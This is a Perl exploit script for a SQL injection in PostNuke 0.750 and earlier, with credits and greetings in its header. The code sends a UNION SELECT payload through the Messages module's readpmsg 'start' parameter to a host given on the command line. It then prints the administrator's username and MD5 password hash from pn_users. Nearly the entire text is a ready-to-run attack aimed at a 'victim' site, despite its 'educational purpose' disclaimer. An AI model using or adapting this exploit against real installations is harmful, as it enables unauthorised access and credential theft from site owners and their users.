#!/usr/bin/perl
PostNuke <= 0.750.php SQL Injection Exploit
# This tools is only for educational purpose## K-C0d3r a x0n3-h4ck friend !!!## This exploit should give admin nick and md5 password##-=[ PostNuke SQL Injection version : x=> 0.750]=-#-=[ ]=-#-=[ Discovered by sp3x ]=-#-=[ Coded by K-C0d3r ]=-#-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-## Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke## !!! NOW IS PUBLIC (6-6-2005) !!!use IO::Socket;sub Usage {print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";exit;}if (@ARGV < 2){ Usage();}if (@ARGV > 2){ Usage();}if (@ARGV == 2){$host = @ARGV[0];$path = @ARGV[1];print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";print "[+] Connecting to $host\n";$injection = "$host\/$path?";$injection .= "op=modload&name=Messages&file=readpmsg&start=0";$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";$socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket;print "[+] Injecting command ...\n";print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";while (<$socket>){ print $_; exit;}}